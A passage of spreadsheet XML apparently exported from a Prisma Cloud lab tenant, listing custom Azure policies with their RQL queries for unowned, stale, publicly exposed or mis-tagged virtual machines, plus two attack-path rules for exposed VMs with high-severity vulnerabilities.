      <c r="A2484" t="inlineStr"/>
      <c r="B2484" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2484" s="2" t="inlineStr"/>
      <c r="D2484" t="inlineStr"/>
      <c r="E2484" t="inlineStr"/>
      <c r="F2484" t="inlineStr"/>
      <c r="G2484" t="b">
        <v>0</v>
      </c>
      <c r="H24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84" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2484" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2484" t="inlineStr">
        <is>
          <t>Adams PLC UPDATE TEST1</t>
        </is>
      </c>
      <c r="L2484" t="inlineStr"/>
      <c r="M2484" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2484" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2484" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2484" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2484" t="inlineStr"/>
      <c r="R2484" t="inlineStr"/>
      <c r="S2484" t="inlineStr">
        <is>
          <t>Autoreplaced,Database</t>
        </is>
      </c>
      <c r="T2484" t="b">
        <v>0</v>
      </c>
      <c r="U2484" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2484" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set-vm</t>
        </is>
      </c>
      <c r="W2484" t="inlineStr"/>
      <c r="X2484" t="inlineStr"/>
      <c r="Y2484" t="inlineStr"/>
      <c r="Z2484" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'Azure Compute' and api.name = 'azure-virtual-machine-scale-set-vm' AND json.rule = "_DateTime.ageInDays(instanceViewDetails.disks[0].statuses[0].time) &gt; 3 and tags.owner does not exist" addcolumn instanceViewDetails.disks[0].statuses[0].time</t>
        </is>
      </c>
      <c r="AA2484" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2484" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2484" t="inlineStr"/>
      <c r="AD2484" t="b">
        <v>0</v>
      </c>
      <c r="AE2484" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2484" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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84" t="inlineStr">
        <is>
          <t>2c097aff-85c8-44fa-a8d1-aa6f5ed75f48</t>
        </is>
      </c>
      <c r="AI2484" t="inlineStr">
        <is>
          <t>92ddcfc1-d869-4692-a33a-f782a454607c</t>
        </is>
      </c>
      <c r="AJ2484" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2484" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2485">
      <c r="A2485" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2485" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2485" s="2" t="inlineStr"/>
      <c r="D2485" t="inlineStr"/>
      <c r="E2485" t="inlineStr"/>
      <c r="F2485" t="inlineStr"/>
      <c r="G2485" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2485" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2485" t="inlineStr">
        <is>
          <t>Azure AKS - 7 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2485" t="inlineStr"/>
      <c r="M2485" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2485" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2485" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2485" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2485" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2485" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2485" t="inlineStr"/>
      <c r="T2485" t="b">
        <v>0</v>
      </c>
      <c r="U2485" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2485" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set-vm</t>
        </is>
      </c>
      <c r="W2485" t="inlineStr"/>
      <c r="X2485" t="inlineStr"/>
      <c r="Y2485" t="inlineStr"/>
      <c r="Z2485" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'Azure Compute' and api.name = 'azure-virtual-machine-scale-set-vm' AND json.rule = "_DateTime.ageInDays(instanceViewDetails.disks[0].statuses[0].time) &gt; 7 and tags.owner does not exist" addcolumn instanceViewDetails.disks[0].statuses[0].time</t>
        </is>
      </c>
      <c r="AA2485" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2485" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2485" t="inlineStr"/>
      <c r="AD2485" t="b">
        <v>0</v>
      </c>
      <c r="AE2485" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2485" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>c38c1a2b-a11e-49ff-b0f7-d5bb9ef18179</t>
        </is>
      </c>
      <c r="AI2485" t="inlineStr">
        <is>
          <t>cefc9964-4eea-4f43-80fd-ad0c79aa65d1</t>
        </is>
      </c>
      <c r="AJ2485" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2485" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2486">
      <c r="A2486" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2486" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2486" s="2" t="inlineStr"/>
      <c r="D2486" t="inlineStr"/>
      <c r="E2486" t="inlineStr"/>
      <c r="F2486" t="inlineStr"/>
      <c r="G2486" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2486" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2486" t="inlineStr">
        <is>
          <t>Azure AKS - 45 Days - Owned</t>
        </is>
      </c>
      <c r="L2486" t="inlineStr"/>
      <c r="M2486" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2486" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2486" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2486" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2486" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2486" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S2486" t="inlineStr"/>
      <c r="T2486" t="b">
        <v>0</v>
      </c>
      <c r="U2486" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2486" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set-vm</t>
        </is>
      </c>
      <c r="W2486" t="inlineStr"/>
      <c r="X2486" t="inlineStr"/>
      <c r="Y2486" t="inlineStr"/>
      <c r="Z2486" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'Azure Compute' and api.name = 'azure-virtual-machine-scale-set-vm' AND json.rule = "_DateTime.ageInDays(instanceViewDetails.disks[0].statuses[0].time) &gt; 45 and tags.owner exists" addcolumn instanceViewDetails.disks[0].statuses[0].time tags.owner</t>
        </is>
      </c>
      <c r="AA2486" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2486" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2486" t="inlineStr"/>
      <c r="AD2486" t="b">
        <v>0</v>
      </c>
      <c r="AE2486" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2486" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>8a5b42fd-f6bd-4a22-81ea-7e811fbed225</t>
        </is>
      </c>
      <c r="AI2486" t="inlineStr">
        <is>
          <t>1d149e59-6a35-4867-ac30-1f91450d076c</t>
        </is>
      </c>
      <c r="AJ2486" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2486" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2487">
      <c r="A2487" t="inlineStr"/>
      <c r="B2487" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2487" s="2" t="inlineStr"/>
      <c r="D2487" t="inlineStr"/>
      <c r="E2487" t="inlineStr"/>
      <c r="F2487" t="inlineStr"/>
      <c r="G2487" t="b">
        <v>0</v>
      </c>
      <c r="H24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 testrule, testrule2</t>
        </is>
      </c>
      <c r="I2487" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2487" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2487" t="inlineStr">
        <is>
          <t>afortes custom attack path Azure</t>
        </is>
      </c>
      <c r="L2487" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2487" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2487" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2487" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2487" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2487" t="inlineStr"/>
      <c r="R2487" t="inlineStr"/>
      <c r="S2487" t="inlineStr"/>
      <c r="T2487" t="b">
        <v>0</v>
      </c>
      <c r="U2487" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2487" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2487" t="inlineStr">
        <is>
          <t>Exposed Azure VMs with no owner and cvss score &gt; 8</t>
        </is>
      </c>
      <c r="X2487" t="inlineStr"/>
      <c r="Y2487" t="inlineStr"/>
      <c r="Z2487" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'azure-vm-list' ) AND finding.name contains all ('Azure Virtual machine configured with public IP and serial console access','(Disabled) Azure VM - 7 Days - No Owner') AND with : ( Vuln where cvss.score &gt; 8 )</t>
        </is>
      </c>
      <c r="AA2487" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2487" t="inlineStr">
        <is>
          <t>2024-09-13 17:21:34</t>
        </is>
      </c>
      <c r="AC2487" t="inlineStr"/>
      <c r="AD2487" t="b">
        <v>0</v>
      </c>
      <c r="AE2487" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2487" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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testrule - Notifications:, AccountGroups:test;, testrule2 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,AWS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2487" t="inlineStr">
        <is>
          <t>4038e101-f0ef-4560-bd32-e620c8f02422</t>
        </is>
      </c>
      <c r="AI2487" t="inlineStr">
        <is>
          <t>7e9f96f5-c1ea-4c25-943b-47d9d7bb0ba4</t>
        </is>
      </c>
      <c r="AJ2487" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2487" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" t="inlineStr"/>
      <c r="B2488" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2488" s="2" t="inlineStr"/>
      <c r="D2488" t="inlineStr"/>
      <c r="E2488" t="inlineStr"/>
      <c r="F2488" t="inlineStr"/>
      <c r="G2488" t="b">
        <v>0</v>
      </c>
      <c r="H24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 testrule, testrule2</t>
        </is>
      </c>
      <c r="I2488" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2488" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2488" t="inlineStr">
        <is>
          <t>test-2-23333</t>
        </is>
      </c>
      <c r="L2488" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2488" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2488" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2488" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2488" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2488" t="inlineStr"/>
      <c r="R2488" t="inlineStr"/>
      <c r="S2488" t="inlineStr"/>
      <c r="T2488" t="b">
        <v>0</v>
      </c>
      <c r="U2488" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2488" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2488" t="inlineStr"/>
      <c r="X2488" t="inlineStr"/>
      <c r="Y2488" t="inlineStr"/>
      <c r="Z2488" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2488" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2488" t="inlineStr">
        <is>
          <t>2024-09-13 17:15:48</t>
        </is>
      </c>
      <c r="AC2488" t="inlineStr"/>
      <c r="AD2488" t="b">
        <v>0</v>
      </c>
      <c r="AE2488" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2488" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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testrule - Notifications:, AccountGroups:test;, testrule2 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,AWS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2488" t="inlineStr">
        <is>
          <t>ee8556f7-3f6e-46c2-b80f-596b8a9078b5</t>
        </is>
      </c>
      <c r="AI2488" t="inlineStr">
        <is>
          <t>89bd513c-39ba-4664-ab00-50ca0e68ccb2</t>
        </is>
      </c>
      <c r="AJ2488" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2488" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2489">
      <c r="A2489" t="inlineStr"/>
      <c r="B2489" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2489" s="2" t="inlineStr"/>
      <c r="D2489" t="inlineStr"/>
      <c r="E2489" t="inlineStr"/>
      <c r="F2489" t="inlineStr"/>
      <c r="G2489" t="b">
        <v>0</v>
      </c>
      <c r="H24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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2489" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2489" t="inlineStr">
        <is>
          <t>Azure VM - 0 Days - No Owner</t>
        </is>
      </c>
      <c r="L2489" t="inlineStr"/>
      <c r="M2489" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2489" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2489" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2489" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2489" t="inlineStr"/>
      <c r="R2489" t="inlineStr"/>
      <c r="S2489" t="inlineStr"/>
      <c r="T2489" t="b">
        <v>0</v>
      </c>
      <c r="U2489" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2489" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2489" t="inlineStr"/>
      <c r="X2489" t="inlineStr"/>
      <c r="Y2489" t="inlineStr"/>
      <c r="Z2489" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule = tags does not contain "owner"</t>
        </is>
      </c>
      <c r="AA2489" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2489" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2489" t="inlineStr"/>
      <c r="AD2489" t="b">
        <v>0</v>
      </c>
      <c r="AE2489" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2489" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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89" t="inlineStr">
        <is>
          <t>44e2794a-462b-4f46-b2b2-24bf0700363a</t>
        </is>
      </c>
      <c r="AI2489" t="inlineStr">
        <is>
          <t>670cd741-7ff2-44ad-908f-ae70e6a3867e</t>
        </is>
      </c>
      <c r="AJ2489" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2489" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2490">
      <c r="A2490" t="inlineStr"/>
      <c r="B2490" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2490" s="2" t="inlineStr"/>
      <c r="D2490" t="inlineStr"/>
      <c r="E2490" t="inlineStr"/>
      <c r="F2490" t="inlineStr"/>
      <c r="G2490" t="b">
        <v>0</v>
      </c>
      <c r="H24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90" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2490" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2490" t="inlineStr">
        <is>
          <t>Azure Virtual Machine Tags didnt include required fields</t>
        </is>
      </c>
      <c r="L2490" t="inlineStr"/>
      <c r="M2490" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2490" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2490" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2490" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2490" t="inlineStr"/>
      <c r="R2490" t="inlineStr"/>
      <c r="S2490" t="inlineStr">
        <is>
          <t>pratik</t>
        </is>
      </c>
      <c r="T2490" t="b">
        <v>0</v>
      </c>
      <c r="U2490" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2490" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2490" t="inlineStr"/>
      <c r="X2490" t="inlineStr"/>
      <c r="Y2490" t="inlineStr"/>
      <c r="Z2490" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule='$.tags[*] size == 1 and ($.tags[*].key does not contain Name or $.tags[*].key does not contain env or $.tags[*].key does not contain projectid or $.tags[*].key does not contain appid or $.tags[*].key does not contain desc) '</t>
        </is>
      </c>
      <c r="AA2490" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2490" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2490" t="inlineStr"/>
      <c r="AD2490" t="b">
        <v>0</v>
      </c>
      <c r="AE2490" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2490" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>ff5e1b50-2fd6-4381-964d-fc1037f8a49f</t>
        </is>
      </c>
      <c r="AI2490" t="inlineStr">
        <is>
          <t>3a137b15-201c-4ddd-b77b-8c80b7af8528</t>
        </is>
      </c>
      <c r="AJ2490" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2490" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" t="inlineStr"/>
      <c r="B2491" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2491" s="2" t="inlineStr"/>
      <c r="D2491" t="inlineStr"/>
      <c r="E2491" t="inlineStr"/>
      <c r="F2491" t="inlineStr"/>
      <c r="G2491" t="b">
        <v>0</v>
      </c>
      <c r="H24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491" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2491" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2491" t="inlineStr">
        <is>
          <t>mdavis1 manulife test</t>
        </is>
      </c>
      <c r="L2491" t="inlineStr"/>
      <c r="M2491" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2491" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2491" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2491" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2491" t="inlineStr"/>
      <c r="R2491" t="inlineStr"/>
      <c r="S2491" t="inlineStr"/>
      <c r="T2491" t="b">
        <v>0</v>
      </c>
      <c r="U2491" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2491" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2491" t="inlineStr"/>
      <c r="X2491" t="inlineStr"/>
      <c r="Y2491" t="inlineStr"/>
      <c r="Z2491" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND cloud.region NOT IN ( 'Azure Central US' ) AND api.name = 'azure-vm-list' AND json.rule = ['properties.networkProfile'].networkInterfaces[*].publicIpAddress exists</t>
        </is>
      </c>
      <c r="AA2491" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2491" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2491" t="inlineStr"/>
      <c r="AD2491" t="b">
        <v>0</v>
      </c>
      <c r="AE2491" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2491" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>fe4e095e-ede3-44f8-a84d-b3a164fb6826</t>
        </is>
      </c>
      <c r="AI2491" t="inlineStr">
        <is>
          <t>81e089bc-0236-4e6d-a421-a453faa096c5</t>
        </is>
      </c>
      <c r="AJ2491" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2491" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" t="inlineStr"/>
      <c r="B2492" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2492" s="2" t="inlineStr"/>
      <c r="D2492" t="inlineStr"/>
      <c r="E2492" t="inlineStr"/>
      <c r="F2492" t="inlineStr"/>
      <c r="G2492" t="b">
        <v>0</v>
      </c>
      <c r="H24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92" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2492" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2492" t="inlineStr">
        <is>
          <t>Azure instance with extension installed</t>
        </is>
      </c>
      <c r="L2492" t="inlineStr"/>
      <c r="M2492" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2492" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2492" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2492" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2492" t="inlineStr"/>
      <c r="R2492" t="inlineStr"/>
      <c r="S2492" t="inlineStr">
        <is>
          <t>extension</t>
        </is>
      </c>
      <c r="T2492" t="b">
        <v>0</v>
      </c>
      <c r="U2492" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2492" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2492" t="inlineStr">
        <is>
          <t>This Policy ensures Azure VM have extensions installed</t>
        </is>
      </c>
      <c r="X2492" t="inlineStr"/>
      <c r="Y2492" t="inlineStr"/>
      <c r="Z2492" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' AND json.rule = Extensions exists</t>
        </is>
      </c>
      <c r="AA2492" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2492" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2492" t="inlineStr"/>
      <c r="AD2492" t="b">
        <v>0</v>
      </c>
      <c r="AE2492" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2492" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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92" t="inlineStr">
        <is>
          <t>e7384378-87b4-4dd3-8e68-6dca1e8c43b0</t>
        </is>
      </c>
      <c r="AI2492" t="inlineStr">
        <is>
          <t>a8b3d4cd-1cfd-41f9-b909-59e4bf33b5b4</t>
        </is>
      </c>
      <c r="AJ2492" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2492" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2493">
      <c r="A2493" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2493" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2493" s="2" t="inlineStr"/>
      <c r="D2493" t="inlineStr"/>
      <c r="E2493" t="inlineStr"/>
      <c r="F2493" t="inlineStr"/>
      <c r="G2493" t="b">
        <v>0</v>
      </c>
      <c r="H24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93" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2493" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2493" t="inlineStr">
        <is>
          <t>Azure VM - 7 Days - No Owner</t>
        </is>
      </c>
      <c r="L2493" t="inlineStr"/>
      <c r="M2493" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2493" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2493" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2493" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2493" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2493" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2493" t="inlineStr"/>
      <c r="T2493" t="b">
        <v>0</v>
      </c>
      <c r="U2493" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2493" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2493" t="inlineStr"/>
      <c r="X2493" t="inlineStr"/>
      <c r="Y2493" t="inlineStr"/>
      <c r="Z2493" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule = tags does not contain "owner" and json.rule = "_DateTime.ageInDays(['properties.timeCreated']) &gt; 7" addcolumn powerState</t>
        </is>
      </c>
      <c r="AA2493" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2493" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2493" t="inlineStr"/>
      <c r="AD2493" t="b">
        <v>0</v>
      </c>
      <c r="AE2493" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2493" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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93" t="inlineStr">
        <is>
          <t>baa4cd34-c92c-45c1-9afa-80055a8932ce</t>
        </is>
      </c>
      <c r="AI2493" t="inlineStr">
        <is>
          <t>f2ac8e79-ec9e-4fcd-bf70-4a3df16a20be</t>
        </is>
      </c>
      <c r="AJ2493" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
